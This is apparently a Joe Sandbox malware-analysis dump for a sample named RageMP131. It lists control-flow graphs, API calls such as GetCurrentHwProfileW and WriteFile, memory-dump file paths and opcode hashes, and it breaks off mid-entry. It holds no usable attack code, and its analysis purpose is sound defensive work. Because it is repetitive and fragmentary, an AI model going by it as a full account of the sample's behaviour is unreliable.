                                      control_flow_graph 153 511046b-51104b4 158 51104c0 153->158 159 51104b6 153->159 160 51104c2-51104ca call 51104cb 158->160 159->160 163 511051c-5110521 160->163 164 51104cc-5110516 160->164 165 5110523-5110535 163->165 166 511059a-51105a4 163->166 164->163 174 511052f-5110535 164->174 171 5110541-5110599 165->171 169 51105a5-5110718 call 511061c 166->169 195 5110723-511072e GetCurrentHwProfileW 169->195 171->169 174->171 196 5110743-51107dc call 51107de 195->196
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9d27356a6c18b33b88446f5f0eb7efaf40e024d97df66c24de63fde99443a5d
                                      • Instruction ID: 2279d5d58ed1cfe4a68c220f6984a17a7d92c4ea034c11ceeb3b1c9e9a182d14
                                      • Opcode Fuzzy Hash: a9d27356a6c18b33b88446f5f0eb7efaf40e024d97df66c24de63fde99443a5d
                                      • Instruction Fuzzy Hash: 5141E5E7A0C115EF616AD1426B5CAF6666FE6DE73073284B6FC07C6502E3944EC9803D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 205 511047d-51104b4 208 51104c0 205->208 209 51104b6 205->209 210 51104c2-51104ca call 51104cb 208->210 209->210 213 511051c-5110521 210->213 214 51104cc-5110516 210->214 215 5110523-5110535 213->215 216 511059a-51105a4 213->216 214->213 224 511052f-5110535 214->224 221 5110541-5110599 215->221 219 51105a5-5110718 call 511061c 216->219 245 5110723-511072e GetCurrentHwProfileW 219->245 221->219 224->221 246 5110743-51107dc call 51107de 245->246
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f672b624788f7253a05770357fa5ebfc7c12fb7606b140d17f61ee60c445727b
                                      • Instruction ID: 429da81a5e7c302a8c67d848bdb1dd82e116e054da25147936a8fec80323fa53
                                      • Opcode Fuzzy Hash: f672b624788f7253a05770357fa5ebfc7c12fb7606b140d17f61ee60c445727b
                                      • Instruction Fuzzy Hash: B041F4E7A0C215EF6169D1426B5C9F6266FE6DA73073284B6FC07C6102E3944EC98439

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 255 51104a1-51104b4 258 51104c0 255->258 259 51104b6 255->259 260 51104c2-51104ca call 51104cb 258->260 259->260 263 511051c-5110521 260->263 264 51104cc-5110516 260->264 265 5110523-5110535 263->265 266 511059a-51105a4 263->266 264->263 274 511052f-5110535 264->274 271 5110541-5110599 265->271 269 51105a5-5110718 call 511061c 266->269 295 5110723-511072e GetCurrentHwProfileW 269->295 271->269 274->271 296 5110743-51107dc call 51107de 295->296
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6128760e9f9037136d9000d61d3e7ce64a6b923a166bcc3f28abf791046f3c4c
                                      • Instruction ID: 3e451c39647f57cf677c02bb732cef167b30dbae4ea279a0f0fa9df2bbca9972
                                      • Opcode Fuzzy Hash: 6128760e9f9037136d9000d61d3e7ce64a6b923a166bcc3f28abf791046f3c4c
                                      • Instruction Fuzzy Hash: 5E41F2EBA0C115EE6169D0422B1CAF7266FE6DE73073284B6FC07C6102E3944EC98439

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 305 51104cb-5110516 309 511051c-5110521 305->309 310 511052f-5110535 305->310 311 5110523-5110535 309->311 312 511059a-51105a4 309->312 313 5110541-5110599 310->313 311->313 315 51105a5-5110718 call 511061c 312->315 313->315 337 5110723-511072e GetCurrentHwProfileW 315->337 338 5110743-51107dc call 51107de 337->338
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: e4519ea1cbd4c0cbaa3e8836559bc0d5df53328e6f6529c51dd69825cb565658
                                      • Instruction ID: bebbfe7708016b250d52f6af861a711f7cdf7fdb3743c70508628bef24080558
                                      • Opcode Fuzzy Hash: e4519ea1cbd4c0cbaa3e8836559bc0d5df53328e6f6529c51dd69825cb565658
                                      • Instruction Fuzzy Hash: 8341CFEBA0C115EE616AD0426B5CAF7666FE6DE73073284B6FC07C6101E3944EC98539

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 347 51104d5-5110516 350 511051c-5110521 347->350 351 511052f-5110535 347->351 352 5110523-5110535 350->352 353 511059a-51105a4 350->353 354 5110541-5110599 351->354 352->354 356 51105a5-5110718 call 511061c 353->356 354->356 378 5110723-511072e GetCurrentHwProfileW 356->378 379 5110743-51107dc call 51107de 378->379
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 1a7261b27ed90c8707c4284b967a81235336fe9575117f8884c3cd73c4c14ea2
                                      • Instruction ID: 2949a0ce3fd73bf9cd347904bd6e37cecf9bcc8e9db56f777d192d50385b83a7
                                      • Opcode Fuzzy Hash: 1a7261b27ed90c8707c4284b967a81235336fe9575117f8884c3cd73c4c14ea2
                                      • Instruction Fuzzy Hash: 4441F2EBA0C115FE616AD1826B1CAF6666FE6DE73073284B6FC07C6101E3944AC9853D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 388 6b21bc-6b21de 389 6b23d1 388->389 390 6b21e4-6b21e6 388->390 393 6b23d3-6b23d7 389->393 391 6b21e8-6b2207 call 6a1443 390->391 392 6b2212-6b2235 390->392 399 6b220a-6b220d 391->399 395 6b223b-6b2241 392->395 396 6b2237-6b2239 392->396 395->391 398 6b2243-6b2254 395->398 396->395 396->398 400 6b2267-6b2277 call 6b1d01 398->400 401 6b2256-6b2264 call 6aae9d 398->401 399->393 406 6b2279-6b227f 400->406 407 6b22c0-6b22d2 400->407 401->400 410 6b22a8-6b22be call 6b18d2 406->410 411 6b2281-6b2284 406->411 408 6b2329-6b2349 WriteFile 407->408 409 6b22d4-6b22da 407->409 414 6b234b-6b2351 408->414 415 6b2354 408->415 417 6b22dc-6b22df 409->417 418 6b2315-6b2327 call 6b1d7e 409->418 430 6b22a1-6b22a3 410->430 412 6b228f-6b229e call 6b1c99 411->412 413 6b2286-6b2289 411->413 412->430 413->412 419 6b2369-6b236c 413->419 414->415 423 6b2357-6b2362 415->423 424 6b2301-6b2313 call 6b1f42 417->424 425 6b22e1-6b22e4 417->425 436 6b22fc-6b22ff 418->436 434 6b236f-6b2371 419->434 431 6b23cc-6b23cf 423->431 432 6b2364-6b2367 423->432 424->436 433 6b22ea-6b22f7 call 6b1e59 425->433 425->434 430->423 431->393 432->419 433->436 438 6b239f-6b23ab 434->438 439 6b2373-6b2378 434->439 436->430 440 6b23ad-6b23b3 438->440 441 6b23b5-6b23c7 438->441 442 6b237a-6b238c 439->442 443 6b2391-6b239a call 6a9f28 439->443 440->389 440->441 441->399 442->399 443->399
                                      APIs
                                      • WriteFile.KERNELBASE(?,00000000,006A5DA7,?,00000000,00000000,00000000,?,00000000,?,0069B2D2,006A5DA7,00000000,0069B2D2,?,?), ref: 006B2341
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 7fe570ffbb82268ad34dfb02e0ca82f8fd3cbce14b2f7a8ab03ced80b1037c63
                                      • Instruction ID: 26eb3e4f34d8c3c887fc17e1baeb95857241cb04641a797042f8f6e613cd7f2b
                                      • Opcode Fuzzy Hash: 7fe570ffbb82268ad34dfb02e0ca82f8fd3cbce14b2f7a8ab03ced80b1037c63
                                      • Instruction Fuzzy Hash: 3161B6B1D0411AAFDF15DFA8C894AFE7BFBAF09304F140149E900AB215D776DA91CBA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 446 51104ec-5110516 448 511051c-5110521 446->448 449 511052f-5110535 446->449 450 5110523-5110535 448->450 451 511059a-51105a4 448->451 452 5110541-5110599 449->452 450->452 454 51105a5-5110718 call 511061c 451->454 452->454 476 5110723-511072e GetCurrentHwProfileW 454->476 477 5110743-51107dc call 51107de 476->477
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 1ec7353e4cc96de648ec691d860585b81f9098db540c13ede53799c84c87f29a
                                      • Instruction ID: 63408da87767b406039a0e42adda4f216a7112858632c681ee98d50e689f4f74
                                      • Opcode Fuzzy Hash: 1ec7353e4cc96de648ec691d860585b81f9098db540c13ede53799c84c87f29a
                                      • Instruction Fuzzy Hash: 0D4113E7A0C105EF616AD0426B2CAF7266FE6DE77073284B6FC07C6101E3A44AC5803C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 486 511051b-5110521 488 5110523-5110599 486->488 489 511059a-51105a4 486->489 491 51105a5-5110718 call 511061c 488->491 489->491 514 5110723-511072e GetCurrentHwProfileW 491->514 515 5110743-51107dc call 51107de 514->515
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: dee794fcec4c1ec8c91a079ea0b770c4ad2b9bd71d040e10d0671afe09d20e5d
                                      • Instruction ID: 235878450308bb7fa0234f0e37a4e2ec71ff2ccb1f1b825665054cbacbeabaad
                                      • Opcode Fuzzy Hash: dee794fcec4c1ec8c91a079ea0b770c4ad2b9bd71d040e10d0671afe09d20e5d
                                      • Instruction Fuzzy Hash: 813114E7A0C115EF616AE0426B5CAF6276FE6DE77073284B6FC47CA141E3940AC9843D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 524 511050f-5110718 call 511061c 549 5110723-511072e GetCurrentHwProfileW 524->549 550 5110743-51107dc call 51107de 549->550
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 1de15522642c08ca30b6178d93e716d1b6e9955fbfb49e8b0ea6dea58ab5fe58
                                      • Instruction ID: 32c04e677a2ce3e0e8c7967c14472980b9984d2aa3b968e29a81a2bdfbb3cc82
                                      • Opcode Fuzzy Hash: 1de15522642c08ca30b6178d93e716d1b6e9955fbfb49e8b0ea6dea58ab5fe58
                                      • Instruction Fuzzy Hash: E63124E7A0C115EFA16AE0426B5CAF7266FE6DE73073284B6FC47C6101E3940AC9803C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 559 5110572-511057a 560 511057c-5110718 call 511061c 559->560 561 511053f-5110540 559->561 585 5110723-511072e GetCurrentHwProfileW 560->585 562 5110551-5110554 561->562 563 5110542-5110549 561->563 565 5110556-511056d 562->565 563->565 565->560 586 5110743-51107dc call 51107de 585->586
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0fdb5c172f7b608f5819b034644ef7391243d922476008d85bfc8296d446d44
                                      • Instruction ID: a561980bbe6f6ba2f6dfd4f6467006dd8af690b6181cd37f4fcbbba833df3aa7
                                      • Opcode Fuzzy Hash: a0fdb5c172f7b608f5819b034644ef7391243d922476008d85bfc8296d446d44
                                      • Instruction Fuzzy Hash: 003135E7A0C115EF616AE0426B6CAF7266FE2DE33073284B6FC47C6101E3940AC9843C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 4f7efb3d377b13c32ea11523977f88e7735737f8cde9bc08e93cbe5d608ac1e7
                                      • Instruction ID: 983d82727cc0ad0e7ab8ac543b8cd21f994def4ef2ec90c878bfc68d23fa567a
                                      • Opcode Fuzzy Hash: 4f7efb3d377b13c32ea11523977f88e7735737f8cde9bc08e93cbe5d608ac1e7
                                      • Instruction Fuzzy Hash: CE3125E7E0C115BEA17AE0421B5CAF6166FE2DE77073284B6FC47D6141E3944AC6803D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 2024d58740c61aa84a49b8a3d3b1566646f663617b4080e354143511da1eaba3
                                      • Instruction ID: 36e938d128f9c895e6fd9446803fb76897871382619da0fbf53ea2d69b318fe6
                                      • Opcode Fuzzy Hash: 2024d58740c61aa84a49b8a3d3b1566646f663617b4080e354143511da1eaba3
                                      • Instruction Fuzzy Hash: 923146E7A4C216AFA22AE0421B5C6F7666FE7DF77073240BAF847D6141D3940AC5813D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: fc385874f1e5ce44d70b2ce58a0eea07fdccdebc9df38cd10d50df37914987c2
                                      • Instruction ID: 93c853f34ea35ccfe23ebea65c0d22719a7ba5a6ecc188fb1a3ffe776ba4b5fb
                                      • Opcode Fuzzy Hash: fc385874f1e5ce44d70b2ce58a0eea07fdccdebc9df38cd10d50df37914987c2
                                      • Instruction Fuzzy Hash: DC21F4EBE4C115AEA16AE0421B6C6F6266FE3DE77073284B6FC47D6141E3940AC6843D
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0062AE01
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction ID: 9e2ca5445aba634514ad649963c140dbc83a1039a5f065516e1cfd74149cd958
                                      • Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction Fuzzy Hash: 7F412672A005249BCF15DFA8ED806AEBBAAEF44301F1406ADF804EB301D770DE119BD6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 94d062787a92866a1521033212292ce4e77610b4490c451db8d016c0fad70cbb
                                      • Instruction ID: 5b59adad50c6dd6ab484f8b4cd76df2e82f912192895a62d45561d57d0e28d1d
                                      • Opcode Fuzzy Hash: 94d062787a92866a1521033212292ce4e77610b4490c451db8d016c0fad70cbb
                                      • Instruction Fuzzy Hash: 6B2137E7E4C105AFA12AE0421B5C6F6266FA3DE77073244B6FC07D6641D3D40AC5843D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 4040b13e33c23258982fc5c3ba7e2af9de00d00e4be7fa0764b31d4529487b23
                                      • Instruction ID: 9201f650ef2f2a9c9bc3d12c3745b86536b1ffca0778d8cde05f466b362cfa5e
                                      • Opcode Fuzzy Hash: 4040b13e33c23258982fc5c3ba7e2af9de00d00e4be7fa0764b31d4529487b23
                                      • Instruction Fuzzy Hash: 372127E7E0C209AFA12AE0425B5C6F6526FD7DE77073245B6FC47D6241D3940AC5843D
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: b2f6d7f1bcd20effc701e934b229f95cbf0a0f334be2cd6e42b5078a2b11f758
                                      • Instruction ID: 0b4135aee0213582dea7baad10d3331b3ef65234c9145d16f1afd1856c4ae91d
                                      • Opcode Fuzzy Hash: b2f6d7f1bcd20effc701e934b229f95cbf0a0f334be2cd6e42b5078a2b11f758
                                      • Instruction Fuzzy Hash: 282167A7E0C21AAE617AE0421B5C9F6666FD6CE77033244B6FC47DA141D3C04EC6857C
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 15cb91c32a8af8f475dbadca118e25cf812e22a609869e8ea3674d3d5925525b
                                      • Instruction ID: 5747e1b9c10e1c773ff93dfb9880d5d4fd5d56e3b68b545e848f2b8f23612025
                                      • Opcode Fuzzy Hash: 15cb91c32a8af8f475dbadca118e25cf812e22a609869e8ea3674d3d5925525b
                                      • Instruction Fuzzy Hash: A41102E6E0C219AE617AE0421B5CAF6226FD6DE77033244B6FC47D6200D3944EC5843C
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: eb6a244768f8231093b76542e328ec61eb13bfdea19b31ab4171d524e379e70b
                                      • Instruction ID: f09c7acfa2c73a0a48d37029f28a5ce63faf11851c9517bbe1dd6653b00b4c6d
                                      • Opcode Fuzzy Hash: eb6a244768f8231093b76542e328ec61eb13bfdea19b31ab4171d524e379e70b
                                      • Instruction Fuzzy Hash: FB1127A6A0D21AAF913AE4021B5C9F6276BD6CE37033244B6F847D6201D3944AC5857D
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 5a43ad75715efc6a0a3d59742cad036ea86505684baf12d28850f77b41a231a9
                                      • Instruction ID: 53cc52f0dbff1d32423e3dc6a745d58e60f3a980c6f391df301d2b762102c074
                                      • Opcode Fuzzy Hash: 5a43ad75715efc6a0a3d59742cad036ea86505684baf12d28850f77b41a231a9
                                      • Instruction Fuzzy Hash: 221180ABA091166F9126F4110A5C6F7276FD6DE77033244B6FC53D6100E3804DC6847C
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 86e0109005186f45bd461f2175336d8c9a184ff087babf27ff2b2b70859ae528
                                      • Instruction ID: 94b98fd137047be508fd00aaf52b47feaee6370399fa54f7e001b91b9c9ad190
                                      • Opcode Fuzzy Hash: 86e0109005186f45bd461f2175336d8c9a184ff087babf27ff2b2b70859ae528
                                      • Instruction Fuzzy Hash: C2115BAAA0D10AAFA126F0411B5CAF6266FD7CE77077244B5FC47D6101E3908AC64578
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: e7600e04e478a0cea0a85d995f592975406f6aceaf38ab1138a092cf75b43472
                                      • Instruction ID: b95f1e74b14c2c9c79904c0ad4e7212bf48b7c2141127704136abf4be8a86985
                                      • Opcode Fuzzy Hash: e7600e04e478a0cea0a85d995f592975406f6aceaf38ab1138a092cf75b43472
                                      • Instruction Fuzzy Hash: 6D1127AAA0D20AAF613AF0421B5C9F6126FD2DE77037244B6F857DA201D3D44AC6453C
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: dd478e98b3d2a9833e25cff5b55b6b30f3f4839c03db554e1e45be874b17e3ed
                                      • Instruction ID: e91d9022c6b4df13afaa18b930baec1505ec6f32c50def9007eccb7c436bf86b
                                      • Opcode Fuzzy Hash: dd478e98b3d2a9833e25cff5b55b6b30f3f4839c03db554e1e45be874b17e3ed
                                      • Instruction Fuzzy Hash: 350126DAB09209BE6026F0411B5CAF7126FD2DE77037284B6FC47D6500D3D44AC6453C
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 9659d3e54260f125c6b780439ff42a305d55dc3a7e9d4f5d8bd60ad80aaf0e0b
                                      • Instruction ID: 5ea15e3d597edb50bc9ce71d4b1f9e283616cf7e0e2160d754952afa47725a07
                                      • Opcode Fuzzy Hash: 9659d3e54260f125c6b780439ff42a305d55dc3a7e9d4f5d8bd60ad80aaf0e0b
                                      • Instruction Fuzzy Hash: B9017BA6F0820BAFE231F1611E5C6BB53AED6DC720772887AF883C6001D344C5C6097D
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,006B1719,00000000,CF830579,006EFCB8,0000000C,006B17D5,006A58DD,?), ref: 006B1888
                                      Memory Dump Source
